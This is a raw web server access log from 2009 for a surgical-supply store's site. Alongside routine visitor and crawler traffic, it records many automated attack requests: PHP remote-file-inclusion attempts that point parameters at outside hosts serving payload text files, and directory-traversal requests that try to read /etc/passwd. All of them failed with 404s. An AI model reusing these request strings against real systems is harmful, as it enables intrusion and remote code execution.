203.236.100.30 - - [12/Aug/2009:07:59:09 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:07:59:09 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:59:10 -0400] "GET /logs/access_log.Q109080400////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:59:17 -0400] "GET /logs/access_log.Q109080300////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:59:17 -0400] "GET /logs/access_log.Q109080400////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:07:59:22 -0400] "GET /logs/access_log.Q109080300////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
79.65.161.222 - - [12/Aug/2009:07:59:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
79.65.161.222 - - [12/Aug/2009:07:59:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
79.65.161.222 - - [12/Aug/2009:07:59:49 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
79.65.161.222 - - [12/Aug/2009:07:59:49 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
172.16.1.62 - - [12/Aug/2009:08:00:23 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.62 - - [12/Aug/2009:08:00:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.62 - - [12/Aug/2009:08:00:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [12/Aug/2009:08:01:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.236.100.30 - - [12/Aug/2009:08:01:56 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:08:01:56 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:08:01:56 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:08:01:56 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
119.63.193.55 - - [12/Aug/2009:08:02:03 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
207.158.22.128 - - [12/Aug/2009:08:02:25 -0400] "GET /logs/access_log.Q109073100////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
172.16.1.62 - - [12/Aug/2009:08:02:27 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.62 - - [12/Aug/2009:08:02:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.62 - - [12/Aug/2009:08:02:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
213.149.105.8 - - [12/Aug/2009:08:02:35 -0400] "GET /logs//playing.php/common/db.php?commonpath=http://www.sh1908.org//bbs/gg_late/idxx.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
213.149.105.8 - - [12/Aug/2009:08:02:35 -0400] "GET //playing.php/common/db.php?commonpath=http://www.sh1908.org//bbs/gg_late/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
213.149.105.8 - - [12/Aug/2009:08:02:41 -0400] "GET /logs/access_log.Q109071100//playing.php/common/db.php?commonpath=http://www.sh1908.org//bbs/gg_late/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:08:02:57 -0400] "GET /logs/access_log.Q109073100////?_SERVER[DOCUMENT_ROOT]=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:08:03:01 -0400] "GET /logs/access_log.Q109062800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.221.88.162 - - [12/Aug/2009:08:03:03 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
64.221.88.162 - - [12/Aug/2009:08:03:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
64.221.88.162 - - [12/Aug/2009:08:03:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
64.221.88.162 - - [12/Aug/2009:08:03:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
172.16.1.80 - - [12/Aug/2009:08:03:05 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [12/Aug/2009:08:03:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [12/Aug/2009:08:03:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.15.225.39 - - [12/Aug/2009:08:03:08 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
67.15.225.39 - - [12/Aug/2009:08:03:08 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
67.15.225.39 - - [12/Aug/2009:08:03:08 -0400] "GET /logs/access_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
195.209.236.77 - - [12/Aug/2009:08:03:17 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.15.225.39 - - [12/Aug/2009:08:03:33 -0400] "GET /logs/error_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
170.158.209.246 - - [12/Aug/2009:08:03:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:03:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:03:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:03:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
213.149.105.8 - - [12/Aug/2009:08:04:10 -0400] "GET /logs/access_log.Q109071100%20%20//playing.php/common/db.php?commonpath=http://www.sh1908.org//bbs/gg_late/idxx.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
170.158.209.246 - - [12/Aug/2009:08:04:04 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip%20over%20floor%20savers HTTP/1.1" 200 38032 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:19 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:20 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:20 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:20 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:21 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:21 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:21 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:21 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:22 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:22 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:22 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:22 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:22 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:29 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):slip over floor savers" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:29 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
170.158.209.246 - - [12/Aug/2009:08:04:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
172.16.1.180 - - [12/Aug/2009:08:04:37 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:08:04:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Aug/2009:08:04:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [12/Aug/2009:08:04:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [12/Aug/2009:08:04:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [12/Aug/2009:08:04:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
85.17.141.172 - - [12/Aug/2009:08:05:09 -0400] "GET /logs/access_log.Q109062500//includes/errors.php?error=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
85.17.141.172 - - [12/Aug/2009:08:05:09 -0400] "GET //includes/errors.php?error=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
85.17.141.172 - - [12/Aug/2009:08:05:09 -0400] "GET /logs//includes/errors.php?error=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
172.16.1.64 - - [12/Aug/2009:08:05:19 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.64 - - [12/Aug/2009:08:05:19 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.64 - - [12/Aug/2009:08:05:19 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.64 - - [12/Aug/2009:08:05:19 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.64 - - [12/Aug/2009:08:05:19 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.64 - - [12/Aug/2009:08:05:19 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
190.144.44.36 - - [12/Aug/2009:08:06:04 -0400] "GET /logs/access_log.Q109061900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:08:06:04 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:08:06:04 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:08:06:04 -0400] "GET /logs/access_log.Q109062900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
203.236.100.30 - - [12/Aug/2009:08:06:04 -0400] "GET /logs/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:08:06:05 -0400] "GET /plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:08:06:05 -0400] "GET /logs/access_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.236.100.30 - - [12/Aug/2009:08:06:06 -0400] "GET /logs/error_log.Q109062800%20%20/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Aug/2009:08:06:07 -0400] "GET /logs/access_log.Q109061900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:08:06:07 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:08:06:07 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Aug/2009:08:06:07 -0400] "GET /logs/access_log.Q109062900/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Aug/2009:08:06:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.110.74.195 - - [12/Aug/2009:08:06:26 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:08:06:26 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:08:06:26 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
